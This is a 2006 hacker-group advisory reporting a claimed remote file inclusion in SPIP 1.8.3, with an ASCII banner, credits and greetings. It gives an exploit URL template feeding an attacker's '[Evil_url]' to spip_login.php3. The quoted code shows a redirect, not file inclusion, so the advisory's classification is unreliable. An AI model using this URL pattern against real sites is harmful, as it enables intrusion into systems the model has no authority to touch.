Vulnerabilities in SPIP
k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k k k k
k k kkkk k kkkk k k kk k k kkkk k kk k k k
------------------------------------------------------------------------------
>=- Remote file inclusion in SPIP
Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,8th 2006
Risk : High
>=- Software description
SIPP is a CMS portal with multilanguage support
Version : 1.8.3
URL : http://www.spip.net
>=- The Vulnerable
http://[victim]/[spip_dir]/spip_login.php3?url=[Evil_url]
---spip_login.php3---------------------------------------------------------------
............
if (isset($_SERVER['REQUEST_URI'])
AND strpos($_SERVER['REQUEST_URI'], 'var_url'))
@header('Location: '.str_replace('var_url', 'url',
$_SERVER['REQUEST_URI']));
............
---spip_login.php3---------------------------------------------------------------
>=- Vendor
Not contacted yet
>=- Shoutz
~ kecoak (cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc)
~ echo staff
(y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,the day)
~ Ph03n1x,spyoff,ghoz,r34d3r,m_beben,slackX,sakitjiwa,xnuxer
>=- Contact
crasher@xxxxxxxxxxxx || http://www.kecoak.or.id